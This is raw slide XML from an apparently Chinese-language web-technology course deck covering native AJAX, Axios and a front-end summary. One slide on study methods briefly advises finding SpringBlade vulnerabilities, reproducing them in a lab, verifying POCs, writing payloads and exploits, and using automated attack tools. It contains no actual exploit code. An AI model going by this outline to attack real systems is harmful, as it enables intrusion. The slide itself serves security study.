            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="668559" y="1193684"/>
            <a:ext cx="2047345" cy="49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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Alibaba PuHuiTi B" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi B" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi B" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>示例 原生</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Alibaba PuHuiTi B" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi B" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi B" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>AJAX</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Alibaba PuHuiTi B" pitchFamily="18" charset="-122"/>
              <a:ea typeface="Alibaba PuHuiTi B" pitchFamily="18" charset="-122"/>
              <a:cs typeface="Alibaba PuHuiTi B" pitchFamily="18" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图形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3219" y="1383778"/>
            <a:ext cx="201682" cy="201682"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="797574" y="3244972"/>
            <a:ext cx="4730060" cy="2392637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6170601" y="3206535"/>
            <a:ext cx="3772636" cy="2431074"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="灯片编号占位符 10"/>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AXIOS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="782320" y="1654698"/>
            <a:ext cx="10526664" cy="1668795"/>
            <a:chOff x="782320" y="1654698"/>
            <a:chExt cx="10526664" cy="1668795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="782320" y="1654698"/>
              <a:ext cx="10526664" cy="1668795"/>
              <a:chOff x="920209" y="1823315"/>
              <a:chExt cx="10322211" cy="1668795"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="矩形: 对角圆角 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920209" y="1823318"/>
                <a:ext cx="10322211" cy="1668792"/>
              </a:xfrm>
              <a:prstGeom prst="round2DiagRect">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 4761"/>
                  <a:gd name="adj2" fmla="val 4001"/>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40000" bIns="180000" rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="360045" lvl="1" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="l"/>
                </a:pP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介绍：</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="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Axios</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对原生的</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Ajax</a:t>
                </a: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进行了封装，简化书写，快速开发。</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lvl="1" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="l"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US"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官网：</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hlinkClick r:id="rId1"/>
                  </a:rPr>
                  <a:t>https://www.axios-http.cn/</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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矩形: 对角圆角 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920209" y="1823315"/>
                <a:ext cx="1507476" cy="431800"/>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600" b="1"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Axios</a:t>
                </a:r>
                <a:endPar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4" name="Shape 2621"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="943694" y="1721922"/>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grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7120074" y="2191538"/>
            <a:ext cx="4109779" cy="764941"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="灯片编号占位符 8"/>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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699650" y="1321973"/>
            <a:ext cx="10698800"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endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699650" y="1795645"/>
            <a:ext cx="7845539" cy="1028476"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr marL="0" algn="ct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400"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>引入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>向服务器发送请求</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 2621"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="394885" y="1388615"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="六边形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="183473" y="1293269"/>
            <a:ext cx="461175" cy="397565"/>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TextBox 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="668559" y="1193683"/>
            <a:ext cx="775195" cy="49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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Alibaba PuHuiTi B" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi B" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi B" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>示例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Alibaba PuHuiTi B" pitchFamily="18" charset="-122"/>
              <a:ea typeface="Alibaba PuHuiTi B" pitchFamily="18" charset="-122"/>
              <a:cs typeface="Alibaba PuHuiTi B" pitchFamily="18" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图形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3219" y="1383778"/>
            <a:ext cx="201682" cy="201682"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="797574" y="2909744"/>
            <a:ext cx="6663754" cy="2109094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7903651" y="2790070"/>
            <a:ext cx="2820671" cy="2202346"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="灯片编号占位符 8"/>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文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="277495" y="1278255"/>
            <a:ext cx="11306810" cy="5049520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>总结：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>前面讲了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>VUE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Axios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>前端技术，也展示了随着计算机的普及以及时间的发展人们对系统需求不断提高，技术也不断创新，从基础库到基础库的封装，从基础库的封装到一个框架衍生，但不管怎么演变基本的技术是不会变</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="7200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>后端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="7200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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学习</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>方法</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41300" y="1214120"/>
            <a:ext cx="6458585" cy="5100320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>带着目的去学：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>学习某个框架到底是为了什么？比如查找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>springBlade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>框架的漏洞借助靶场或者自己搭建并进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>POC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>信息搜集的途径：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对应框架的项目地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>比如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>springBlade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：https://github.com/chillzhuang/SpringBlade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>然后找到该项目对应的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>issues</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等搜索引擎对关键字进行检索搜集：比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>springblade poc cve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>关键字。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>复现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>利用：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>找到对应漏洞点确定漏洞的版本后本地搭建环境进行关键点的回溯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代码审计</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，最后验证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>POC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，验证后编写自己的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在查找网络上有没有自动攻击的工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>脚本，进行辅助</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>渗透。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6769100" y="1172210"/>
            <a:ext cx="4974590" cy="4939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2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6057151" y="2302798"/>
            <a:ext cx="322419" cy="391123"/>
            <a:chOff x="2366233" y="3426339"/>
            <a:chExt cx="1737228" cy="2140326"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形 63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="2700000">
              <a:off x="2373530" y="3419042"/>
              <a:ext cx="1722634" cy="1737228"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="84000">
                  <a:srgbClr val="67FECF"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="3000000" scaled="0"/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>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0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="inpin heiti" panose="00000500000000000000" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2658392" y="4050855"/>
              <a:ext cx="1152909" cy="1515810"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr fontAlgn="auto">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3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HTML</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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文本框 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2900184" y="4518481"/>
              <a:ext cx="669327" cy="673695"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr fontAlgn="auto">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1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结构</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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2" name="组合 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5593726" y="2320393"/>
            <a:ext cx="322419" cy="346092"/>
            <a:chOff x="5485951" y="3426338"/>
            <a:chExt cx="1737228" cy="1893904"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="圆角矩形 63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="2700000">
              <a:off x="5493248" y="3419041"/>
              <a:ext cx="1722634" cy="1737228"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="84000">
                  <a:srgbClr val="67FECF"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="3000000" scaled="0"/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>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0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="inpin heiti" panose="00000500000000000000" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="文本框 27"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5936408" y="4057070"/>
              <a:ext cx="836315" cy="1263172"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
